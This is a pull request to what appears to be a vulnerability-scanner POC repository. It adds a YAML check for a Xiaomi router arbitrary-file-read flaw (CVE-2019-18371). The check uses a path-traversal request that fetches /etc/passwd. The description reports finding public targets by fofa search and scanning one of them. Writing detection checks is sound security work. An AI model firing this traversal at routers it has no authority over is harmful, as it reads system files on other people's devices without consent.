### PR TITLE
小米路由器 任意文件读取漏洞POC

### DIFF
--- a/pocs/xiaomi-router-fileread.yml
+++ b/pocs/xiaomi-router-fileread.yml
@@ -1,17 +1,15 @@
 name: poc-yaml-xiaomi-router-fileread
-# 脚本部分
 transport: http
 rules:
-    r1:
-        request:
-            method: GET
-            path: "/api-third-party/download/extdisks../etc/passwd"
-        expression: |
-            response.status==200 && response.body.bcontains(b'root:')
-expression:
-    r1()
-# 信息部分
+  r0:
+    request:
+      method: GET
+      path: /api-third-party/download/extdisks../etc/passwd
+    expression: >-
+      response.status==200 &&
+      "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string)
+expression: r0()
 detail:
-    author: TavenLi
-    links: 
-        - https://github.com/tavenli
+  author: TavenLi (https://github.com/tavenli)
+  links:
+    - https://www.cve.org/CVERecord?id=CVE-2019-18371

--- a/pocs/xiaomi-router-fileread.yml
+++ b/pocs/xiaomi-router-fileread.yml
@@ -5,9 +5,7 @@ rules:
     request:
       method: GET
       path: /api-third-party/download/extdisks../etc/passwd
-    expression: >-
-      response.status==200 &&
-      "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string)
+    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string)
 expression: r0()
 detail:
   author: TavenLi (https://github.com/tavenli)

--- a/pocs/xiaomi-router-fileread.yml
+++ b/pocs/xiaomi-router-fileread.yml
@@ -5,7 +5,7 @@ rules:
     request:
       method: GET
       path: /api-third-party/download/extdisks../etc/passwd
-    expression: response.status == 200 && response.body.bcontains(b"root:x:0:0")
+    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
 expression: r0()
 detail:
   author: TavenLi (https://github.com/tavenli)

--- a/pocs/xiaomi-router-fileread.yml
+++ b/pocs/xiaomi-router-fileread.yml
@@ -5,7 +5,7 @@ rules:
     request:
       method: GET
       path: /api-third-party/download/extdisks../etc/passwd
-    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string)
+    expression: response.status == 200
 expression: r0()
 detail:
   author: TavenLi (https://github.com/tavenli)

--- a/pocs/xiaomi-router-fileread.yml
+++ b/pocs/xiaomi-router-fileread.yml
@@ -1,0 +1,17 @@
+name: poc-yaml-xiaomi-router-fileread
+# 脚本部分
+transport: http
+rules:
+    r1:
+        request:
+            method: GET
+            path: "/api-third-party/download/extdisks../etc/passwd"
+        expression: |
+            response.status==200 && response.body.bcontains(b'root:')
+expression:
+    r1()
+# 信息部分
+detail:
+    author: TavenLi
+    links: 
+        - https://github.com/tavenli

--- a/pocs/xiaomi-router-fileread.yml
+++ b/pocs/xiaomi-router-fileread.yml
@@ -5,7 +5,7 @@ rules:
     request:
       method: GET
       path: /api-third-party/download/extdisks../etc/passwd
-    expression: response.status == 200
+    expression: response.status == 200 && response.body.bcontains(b"root:x:0:0")
 expression: r0()
 detail:
   author: TavenLi (https://github.com/tavenli)


### PR DESCRIPTION
**请先认真阅读下列要求，如不符合会被直接关闭 PR**

- 确保当前 POC 与已有的 POC 没有重复，除了仓库 `pocs` 目录中的，还有内置的几个用 Go 写的 POC也不要重复：
  ```
  poc-go-php-cve-2019-11043-rce
  poc-go-seeyon-htmlofficeservlet-rce
  poc-go-tongda-lfi-upload-rce
  poc-go-tongda-arbitrary-auth
  poc-go-ecology-dbconfig-info-leak
  poc-go-tomcat-put
  poc-go-tomcat-cve-2020-1938
  ```
  
- 阅读规范和要求 
  - https://chaitin.github.io/xray/#/guide/contribute
  - https://chaitin.github.io/xray/#/guide/high_quality_poc

- 一个 pull request 只提交一个 poc

- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员

 - 不接受没有测试环境的 poc，测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps)，也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址，如果有特殊情况，请私聊群内管理解决。
 
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。

**我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可，否则不予通过。**

----------

## 本 poc 是检测什么漏洞的
该漏洞为 小米路由器 任意文件读取漏洞POC

## 测试环境
通过fofa搜索：title="小米路由器" && port="8098"
对查找出的结果目标使用poc扫描：
.\xray webscan --poc ./pocs/xiaomi-router-fileread.yml --url http://113.xxx.xxx.xxx:8098 --html-output xray-report.html

## 备注
